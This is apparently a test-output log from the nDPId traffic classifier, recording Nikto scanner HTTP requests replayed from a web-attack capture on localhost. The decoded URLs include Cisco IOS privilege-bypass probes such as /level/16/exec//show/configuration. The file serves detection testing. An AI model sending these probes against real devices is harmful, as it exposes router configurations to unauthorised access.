+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001258)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277574,"pkt":"AAAAAAAAAAAAAAAACABFAADcDd9AAEAGLjt\/AAABfwAAAcX6H5DZiDUt3Agrh4AYAED+0AAAAQEICp1m\/m6dZv5uR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":560,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277574,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001259)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420277575,"pkt":"AAAAAAAAAAAAAAAACABFAADj4RhAAEAGWvp\/AAABfwAAAcX8H5B4Mdnl8T5RpIAYAED+1wAAAQEICp1m\/m+dZv5vR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2ludGVyZmFjZXMvc3RhdHVzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjApDQoNCg=="} +01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":561,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420277575,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/interfaces\/status","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001260)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 